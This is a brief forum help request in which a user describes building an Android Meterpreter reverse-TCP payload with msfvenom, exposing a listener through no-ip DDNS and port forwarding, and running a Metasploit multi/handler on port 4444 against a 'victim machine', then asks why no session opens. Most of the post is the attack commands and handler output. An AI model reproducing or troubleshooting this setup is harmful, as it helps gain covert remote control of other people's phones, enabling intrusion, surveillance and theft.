first , i download no-ip in my linux machine after i create an account ........
i checked the host name by pinging it
then i create a payload :
msfvenom -p android/meterpreter/reverse_tcp LHOST=
" i port forwarding this port and check it ,
hostname is the ddns "
then launch METASPLOIT
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 4444
exploit
Handler failed to bind to
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...
then it can't listen to any session , what is the problem? please help .
note that i make every thing in the linux machine and the payload is running at the victim machine
Comments
No Comments Exist
Be the first, drop a comment!